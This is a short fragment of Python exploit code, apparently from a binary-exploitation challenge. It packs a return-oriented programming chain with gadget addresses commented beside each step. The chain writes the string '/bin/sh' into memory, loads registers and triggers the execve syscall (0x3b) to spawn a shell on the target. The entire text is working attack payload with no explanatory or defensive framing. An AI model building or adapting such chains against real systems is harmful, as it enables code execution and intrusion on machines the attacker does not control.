payload = p64(0x404ce2)
#0x404ce2: pop rbx ; ret
payload += p64(0x415070)+p64(0x405c49)
# 0x0000000000405c49: pop rax; ret; 
payload += p64(0x68662f6e69622f)+p64(0x40760d)
# 0x000000000040760d: mov qword ptr [rbx], rax; mov eax, 1; pop rbx; ret; 
payload += p64(0x0)+p64(0x404ce2)
# 0x404ce2: pop rbx ; ret
payload += p64(0x415070)+p64(0x405c49)
# 0x0000000000405c49: pop rax; ret; 
payload += p64(0x40903c)+p64(0x40a842)
# 0x000000000040a842: mov edi, ebx; call rax; 
payload += b''
# 0x000000000040903c: pop rbp; pop r14; ret; 
payload += p64(0x0)+p64(0x408671)
# 0x0000000000408671: pop rsi; ret; 
payload += p64(0x0)+p64(0x407147)
# 0x0000000000407147: mov edx, 0; test rdx, rdx; je 0x7145; pop rbp; mov rsi, rax; mov edi, 0x610528; jmp rdx; 
payload += p64(0x0)+p64(0x405c49)
# 0x0000000000405c49: pop rax; ret; 
payload += p64(0x3b)+p64(0x40573f)
# 0x000000000040573f: syscall; 
payload += b''
